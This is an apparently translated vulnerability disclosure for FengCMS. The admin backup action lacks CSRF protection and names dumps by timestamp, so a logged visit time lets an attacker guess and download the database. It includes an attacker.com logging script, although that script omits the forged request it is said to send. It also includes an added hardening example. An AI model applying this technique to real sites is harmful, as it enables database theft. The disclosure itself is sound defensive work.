FengCMS CSRF vulnerability can cause database dumping

Source: Internet
Author: User

Important administrative functions can be triggered cross-site because they perform no CSRF token verification

Detailed description:

The database backup function in the administrative backend performs no CSRF token verification.

The attacker creates the following csrf.php and hosts it at attacker.com:

<?php
// Appends the visitor's address and the time of the visit to test.txt; this is
// how the attacker later learns when the administrator opened the page.
file_put_contents("test.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND);
file_put_contents("test.txt", " Time:".date("Y.m.d H:i:s"), FILE_APPEND);
?>

The URL http://attacker.com/csrf.php is then sent to the victim (the website administrator). If the administrator is logged in when the page is opened, the administrator's browser sends a database backup request to the target server:

?controller=dbmanage&operate=save&type=0

At the same time, the attacker obtains the approximate time at which the administrator sent the request. (Strictly speaking, the time recorded is that of the attacker's own server. However, apart from Xinjiang there is no time difference between servers within the same country, and the servers are synchronized with time servers, so the difference between the two machines can be ignored.)

The attacker now opens http://attacker.com/test.txt?manager to read the logged request:

IP:119.72.193.99 Time:2014.07.14 00:48:39

This timestamp is then rewritten in the format FengCMS uses for backup files:

a-b-c_def/00001.sql (a = year, b = month, c = day, d = hour, e = minute, f = second)

For the logged time, this gives:

2014-07-14_004839/00001.sql

Finally, the backup directory path is prepended:

http://10.211.55.4/admin/app/dbbackup/2014-07-14_004839/00001.sql

In the local network test the time difference was about 2 seconds. Over the Internet it will certainly be larger, depending on actual network conditions, but not by much; the unit is still seconds. The attacker therefore only has to increment the seconds in the URL one at a time, starting from 39.

Finally, the backup data can be downloaded.
Proof of vulnerability:

The attacker successfully obtained the backup database path and downloaded the file.

Solution:

1. The backup file name is too predictable. We recommend using a random, unguessable file name instead.
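
The two fixes the write-up points to, missing CSRF token verification and the clock-derived file name, written out as an added example (illustrative code, not FengCMS's own): the backup handler accepts only POST, checks a per-session CSRF token, and names the dump with random bytes. The function names, the session layout and the backup directory are assumptions.

```php
<?php
// Added example, not FengCMS code: a hardened handler for the
// ?controller=dbmanage&operate=save operation. Function names, the session
// layout and the backup directory are assumptions for illustration.
session_start();

// Issue one random token per admin session. Embed it in the backup form as a
// hidden field named csrf_token (escaped with htmlspecialchars).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A page on another origin can make the admin's browser send the request, but
// it cannot read the token out of the admin's session, so this check fails.
function require_csrf_token(): void
{
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
}

// Name the dump with 128 bits from the CSPRNG instead of the clock, so the
// name cannot be reconstructed from a timestamp, and keep it outside the
// document root so it is not fetchable by URL at all.
function backup_path(string $backupDir): string
{
    $name = date('Y-m-d') . '_' . bin2hex(random_bytes(16)) . '.sql';
    return rtrim($backupDir, '/') . '/' . $name;
}

if (($_GET['controller'] ?? '') === 'dbmanage' && ($_GET['operate'] ?? '') === 'save') {
    // State-changing operations only via POST; the original fired on a plain GET.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('backup must be requested with POST');
    }
    require_csrf_token();
    $target = backup_path(__DIR__ . '/../../private/dbbackup'); // assumed non-web path
    // dump_database($target) would go here (FengCMS's own dump routine, not shown).
}
```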
